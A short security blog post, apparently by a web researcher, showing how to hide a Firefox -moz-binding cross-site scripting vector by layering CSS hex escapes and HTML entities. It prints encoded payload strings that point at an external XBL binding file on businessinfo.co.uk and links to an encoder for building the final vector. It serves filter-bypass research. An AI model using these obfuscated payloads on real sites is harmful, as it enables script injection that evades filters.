Moz-binding XSS fun

CSS supports hex encoding within styles as well html entities, but did you know you could combine them both? I didn't. To construct an attack similar to the one displayed below you first need to convert your CSS property to hex, so -moz-binding becomes: \2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67, notice there is no "x" prefix or double zeros like you would see in HTML entities or Unicode Javascript. The link contains a Hackvertor URL to help you with the conversion.

You can do the same conversion on the value of the property, so the url of the moz-binding payload: //businessinfo.co.uk/labs/xbl/xbl.xml#xss becomes : <a href="http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PEByZXBsYWNlKDAwLCk%2BPEB1bmkoXCk%2BLy9idXNpbmVzc2luZm8uY28udWsvbGFicy94YmwveGJsLnhtbCN4c3M8QC91bmk%2BPEAvcmVwbGFjZT4%3D">\2f\2f\62\75\73\69\6e\65\73\73\69\6e\66\6f\2e\63\6f\2e\75\6b\2f\6c\61\62 \73\2f\78\62\6c\2f\78\62\6c\2e\78\6d\6c\23\78\73\73</a>

I hope you're following so far, we can now take the property string and encode it further, crazy eh? Any part of the property can now be encoded with html entities. I went for the backslash and malformed entities but you can experiment with different combinations. The property "\2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67" now becomes: <a href="http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PEByZXBsYWNlKFxcLDxAaGV4X2VudCgpPlw8QC9oZXhfZW50Pik%2BXDJkXDZkXDZmXDdhXDJkXDYyXDY5XDZlXDY0XDY5XDZlXDY3PEAvcmVwbGFjZT4%3D">&#x5c2d&#x5c6d&#x5c6f&#x5c7a&#x5c2d&#x5c62&#x5c69& #x5c6e&#x5c64&#x5c69&#x5c6e&#x5c67</a>.

Here is the final vector with a link to hackvertor for testing:- The final vector